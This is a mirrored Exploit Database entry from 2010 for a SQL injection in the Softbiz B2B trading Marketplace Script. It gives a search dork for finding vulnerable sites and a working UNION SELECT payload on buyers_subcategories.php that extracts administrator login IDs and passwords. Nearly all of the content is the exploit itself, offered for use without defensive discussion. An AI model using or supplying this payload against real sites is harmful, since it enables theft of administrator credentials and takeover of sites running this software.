Softbiz B2B trading Marketplace Script – buyers_subcategories SQL Injection

• Exploit Database
• 113 阅读

• 作者： AnGrY BoY
  日期： 2010-04-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12245/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

  # Exploit Title: Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability # Date :15/4/2010 # Author : AnGrY BoY # Contact: h4kurd@hotmail.com & h4kurd@yahoo.com # Home : http://www.kurd-security.com # Software Link : N/A # Version : Softbiz B2B trading Marketplace Script # Tested on : windows SP2 # CVE : 0 # Dork : buyers_subcategories.php?IndustryID= # expolit:     # http://localhost/path/buyers_subcategories.php?IndustryID=[SQL] # http://localhost/path/buyers_subcategories.php?IndustryID=1+union+select+1,2,concat(LoginID,0x3d,password)+from+admin-- ============================================= # Gre3tZ :- all kurd-security members